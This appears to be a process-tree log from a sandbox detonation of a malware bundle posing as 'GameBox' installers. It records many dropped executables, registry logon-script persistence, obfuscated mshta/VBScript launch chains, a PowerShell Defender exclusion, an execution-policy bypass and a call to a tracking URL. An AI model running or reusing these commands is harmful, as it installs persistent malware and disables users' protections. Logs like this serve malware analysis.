C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KFBQ2.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-KFBQ2.tmp\Inlog.tmp" /SL5="$10350,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-F6GP4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-F6GP4.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7214⤵
-
C:\Users\Admin\AppData\Local\Temp\is-05TQ2.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-05TQ2.tmp\Setup.tmp" /SL5="$204A0,17352269,721408,C:\Users\Admin\AppData\Local\Temp\is-F6GP4.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7215⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-A9C02.tmp\{app}\microsoft.cab -F:* %ProgramData%6⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-A9C02.tmp\{app}\microsoft.cab -F:* C:\ProgramData7⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A9C02.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-A9C02.tmp\{app}\vdi_compiler"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-A9C02.tmp\{app}\vdi_compiler.exe"7⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 48⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7216⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"3⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-LTPQJ.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-LTPQJ.tmp\WEATHER Manager.tmp" /SL5="$1035E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-KLSII.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KLSII.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7154⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-KLSII.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-KLSII.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-CJ9GD.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-CJ9GD.tmp\MediaBurner2.tmp" /SL5="$10388,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-3UD6R.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-3UD6R.tmp\3377047_logo_media.exe" /S /UID=burnerch24⤵
-
C:\Program Files\Windows Photo Viewer\AITNGSZKWN\ultramediaburner.exe"C:\Program Files\Windows Photo Viewer\AITNGSZKWN\ultramediaburner.exe" /VERYSILENT5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4T9EN.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4T9EN.tmp\ultramediaburner.tmp" /SL5="$2038A,281924,62464,C:\Program Files\Windows Photo Viewer\AITNGSZKWN\ultramediaburner.exe" /VERYSILENT6⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu7⤵
-
C:\Users\Admin\AppData\Local\Temp\26-64098-51c-ddf94-4f51d3b6c78fe\SHobudirivo.exe"C:\Users\Admin\AppData\Local\Temp\26-64098-51c-ddf94-4f51d3b6c78fe\SHobudirivo.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\db-ddbc2-321-79789-25d57c3661132\Sabycorilu.exe"C:\Users\Admin\AppData\Local\Temp\db-ddbc2-321-79789-25d57c3661132\Sabycorilu.exe"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cyxge2dc.ptq\GcleanerEU.exe /eufive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\cyxge2dc.ptq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\cyxge2dc.ptq\GcleanerEU.exe /eufive7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3uh3qyn.kzs\installer.exe /qn CAMPAIGN="654" & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\l3uh3qyn.kzs\installer.exeC:\Users\Admin\AppData\Local\Temp\l3uh3qyn.kzs\installer.exe /qn CAMPAIGN="654"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\upjy1cvv.s5s\ufgaa.exe & exit6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ux4nz2xp.txw\anyname.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\ux4nz2xp.txw\anyname.exeC:\Users\Admin\AppData\Local\Temp\ux4nz2xp.txw\anyname.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\ux4nz2xp.txw\anyname.exe"C:\Users\Admin\AppData\Local\Temp\ux4nz2xp.txw\anyname.exe" -q8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ysc0zunc.h52\gcleaner.exe /mixfive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\ysc0zunc.h52\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ysc0zunc.h52\gcleaner.exe /mixfive7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fh5motkh.qha\autosubplayer.exe /S & exit6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1223471.exe"C:\Users\Admin\AppData\Roaming\1223471.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\4983537.exe"C:\Users\Admin\AppData\Roaming\4983537.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\6074099.exe"C:\Users\Admin\AppData\Roaming\6074099.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4486205.exe"C:\Users\Admin\AppData\Roaming\4486205.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\6213878.exe"C:\Users\Admin\AppData\Roaming\6213878.exe"3⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-G7EH7.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-G7EH7.tmp\VPN.tmp" /SL5="$10364,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-S0F4K.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-S0F4K.tmp\Setup.exe" /silent /subid=7204⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0PLCO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-0PLCO.tmp\Setup.tmp" /SL5="$104A2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-S0F4K.tmp\Setup.exe" /silent /subid=7205⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "6⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09017⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "6⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09017⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall6⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q3⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\wpNAviy54fGZplOuZDZ1bJJc.exe"C:\Users\Admin\Documents\wpNAviy54fGZplOuZDZ1bJJc.exe"3⤵
-
C:\Users\Admin\Documents\T8zNecz4eD2H3r1KGcFKmgoa.exe"C:\Users\Admin\Documents\T8zNecz4eD2H3r1KGcFKmgoa.exe"3⤵
-
C:\Users\Admin\Documents\imLfZWuqEodE2j_nFfhDzweD.exe"C:\Users\Admin\Documents\imLfZWuqEodE2j_nFfhDzweD.exe"3⤵
-
C:\Users\Admin\Documents\R8nO5KorPcVDllCd0stxnwSH.exe"C:\Users\Admin\Documents\R8nO5KorPcVDllCd0stxnwSH.exe"3⤵
-
C:\Users\Admin\Documents\mBmgCtfIlDKzUJ7YxAHLKFQ3.exe"C:\Users\Admin\Documents\mBmgCtfIlDKzUJ7YxAHLKFQ3.exe"3⤵
-
C:\Users\Admin\Documents\78w88nYBN4sJo_5bWmF9jIas.exe"C:\Users\Admin\Documents\78w88nYBN4sJo_5bWmF9jIas.exe"3⤵
-
C:\Users\Admin\Documents\78w88nYBN4sJo_5bWmF9jIas.exeC:\Users\Admin\Documents\78w88nYBN4sJo_5bWmF9jIas.exe4⤵
-
C:\Users\Admin\Documents\cUP88ByUrYfPoxcs9rkiVbig.exe"C:\Users\Admin\Documents\cUP88ByUrYfPoxcs9rkiVbig.exe"3⤵
-
C:\Users\Admin\Documents\9GAfLAAJjugV_0IYDIr7shzi.exe"C:\Users\Admin\Documents\9GAfLAAJjugV_0IYDIr7shzi.exe"3⤵
-
C:\Users\Admin\Documents\XK1n30l538BJIIZ7WkmO0RNJ.exe"C:\Users\Admin\Documents\XK1n30l538BJIIZ7WkmO0RNJ.exe"3⤵
-
C:\Users\Admin\Documents\QLJQCfwA9ISpTUsUEeOz7JHE.exe"C:\Users\Admin\Documents\QLJQCfwA9ISpTUsUEeOz7JHE.exe"3⤵
-
C:\Users\Admin\Documents\QLJQCfwA9ISpTUsUEeOz7JHE.exe"C:\Users\Admin\Documents\QLJQCfwA9ISpTUsUEeOz7JHE.exe"4⤵
-
C:\Users\Admin\Documents\ZsgxHC6WCh4VQ6uFF9U47yWv.exe"C:\Users\Admin\Documents\ZsgxHC6WCh4VQ6uFF9U47yWv.exe"3⤵
-
C:\Users\Admin\Documents\joThVgtZlkMTyRmz0Ukvw0fU.exe"C:\Users\Admin\Documents\joThVgtZlkMTyRmz0Ukvw0fU.exe"3⤵
-
C:\Users\Admin\Documents\UYgu5FtfgM_jyOjapEKKv1nn.exe"C:\Users\Admin\Documents\UYgu5FtfgM_jyOjapEKKv1nn.exe"3⤵
-
C:\Users\Admin\Documents\3oUUQOwFpe7Th3qGhr8oNM_e.exe"C:\Users\Admin\Documents\3oUUQOwFpe7Th3qGhr8oNM_e.exe"3⤵
-
C:\Users\Admin\Documents\3oUUQOwFpe7Th3qGhr8oNM_e.exe"C:\Users\Admin\Documents\3oUUQOwFpe7Th3qGhr8oNM_e.exe"4⤵
-
C:\Users\Admin\Documents\sdOGrP11avknfT5WdlIA4hrD.exe"C:\Users\Admin\Documents\sdOGrP11avknfT5WdlIA4hrD.exe"3⤵
-
C:\Users\Admin\Documents\AY6Etl6CuuITT6iXQPhE_rtU.exe"C:\Users\Admin\Documents\AY6Etl6CuuITT6iXQPhE_rtU.exe"3⤵
-
C:\Users\Admin\Documents\AY6Etl6CuuITT6iXQPhE_rtU.exeC:\Users\Admin\Documents\AY6Etl6CuuITT6iXQPhE_rtU.exe4⤵
-
C:\Users\Admin\Documents\6o6jWJheDXSMx7dmb2y6NjMW.exe"C:\Users\Admin\Documents\6o6jWJheDXSMx7dmb2y6NjMW.exe"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\6o6jWJheDXSMx7dmb2y6NjMW.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\6o6jWJheDXSMx7dmb2y6NjMW.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\6o6jWJheDXSMx7dmb2y6NjMW.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\6o6jWJheDXSMx7dmb2y6NjMW.exe" ) do taskkill -f -iM "%~NxA"5⤵
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "6o6jWJheDXSMx7dmb2y6NjMW.exe"6⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\tPghF3vBf7QwiOqU_xmNs0oI.exe"C:\Users\Admin\Documents\tPghF3vBf7QwiOqU_xmNs0oI.exe"3⤵
-
C:\Users\Admin\Documents\O16EaCO8vUpaS11QUus_Bpt2.exe"C:\Users\Admin\Documents\O16EaCO8vUpaS11QUus_Bpt2.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\4722654.exe"C:\Users\Admin\AppData\Roaming\4722654.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\7732874.exe"C:\Users\Admin\AppData\Roaming\7732874.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\5281144.exe"C:\Users\Admin\AppData\Roaming\5281144.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\8125168.exe"C:\Users\Admin\AppData\Roaming\8125168.exe"4⤵
-
C:\Users\Admin\Documents\fJUNOqKyKZQXRgLPhJIh1X09.exe"C:\Users\Admin\Documents\fJUNOqKyKZQXRgLPhJIh1X09.exe"3⤵
-
C:\Users\Admin\Documents\ykNZ2aHvykIgg4kHsW4NhE_S.exe"C:\Users\Admin\Documents\ykNZ2aHvykIgg4kHsW4NhE_S.exe"3⤵
-
C:\Users\Admin\Documents\7v4d3GzyCZTGFn85icAyNKJQ.exe"C:\Users\Admin\Documents\7v4d3GzyCZTGFn85icAyNKJQ.exe"3⤵
-
C:\Users\Admin\Documents\2VBI4Q5Dt_CCy9ZrSc4TOvGW.exe"C:\Users\Admin\Documents\2VBI4Q5Dt_CCy9ZrSc4TOvGW.exe"3⤵
-
C:\Users\Admin\Documents\2VBI4Q5Dt_CCy9ZrSc4TOvGW.exe"C:\Users\Admin\Documents\2VBI4Q5Dt_CCy9ZrSc4TOvGW.exe"4⤵
-
C:\Users\Admin\Documents\Qe_ye0XnQxeyqNyrt92kefBU.exe"C:\Users\Admin\Documents\Qe_ye0XnQxeyqNyrt92kefBU.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IA2TB.tmp\Qe_ye0XnQxeyqNyrt92kefBU.tmp"C:\Users\Admin\AppData\Local\Temp\is-IA2TB.tmp\Qe_ye0XnQxeyqNyrt92kefBU.tmp" /SL5="$20416,138429,56832,C:\Users\Admin\Documents\Qe_ye0XnQxeyqNyrt92kefBU.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-71VB1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-71VB1.tmp\Setup.exe" /Verysilent5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"6⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 /qn CAMPAIGN=""710"" " CAMPAIGN="710"7⤵
-
C:\Users\Admin\Documents\xfxN57uGvVXcMYcdAYzrjmXY.exe"C:\Users\Admin\Documents\xfxN57uGvVXcMYcdAYzrjmXY.exe"3⤵
-
C:\Users\Admin\Documents\xfxN57uGvVXcMYcdAYzrjmXY.exe"C:\Users\Admin\Documents\xfxN57uGvVXcMYcdAYzrjmXY.exe" -q4⤵
-
C:\Users\Admin\Documents\T81o_EjoTo7M21llomH3JVHK.exe"C:\Users\Admin\Documents\T81o_EjoTo7M21llomH3JVHK.exe"3⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\T81O_E~1.DLL,s C:\Users\Admin\DOCUME~1\T81O_E~1.EXE4⤵
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\T81O_E~1.DLL,PiMbWlJ3RA==5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\T81O_E~1.DLL6⤵
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\T81O_E~1.DLL,YQFfSQ==6⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318047⤵
-
C:\Windows\system32\ctfmon.exectfmon.exe8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp7A68.tmp.ps1"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5208 -s 14963⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\uGmE7ZNudzFhsulIQN2tk8Zf.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\uGmE7ZNudzFhsulIQN2tk8Zf.exe" ) do taskkill -f -iM "%~NxA"1⤵
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "uGmE7ZNudzFhsulIQN2tk8Zf.exe"2⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B1239208771E4393EEDBDE21AC4F3CC5 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0FA8AE5E605850FAEA5EA71E131D8A6C C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2C13BCF95EAACA06E25DBB9760A1819C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6ECDDF3D39C5FC5613BA36CD01A83ED4 C2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x198,0x1e8,0x7ff8284adec0,0x7ff8284aded0,0x7ff8284adee05⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --mojo-platform-channel-handle=1812 /prefetch:85⤵
-
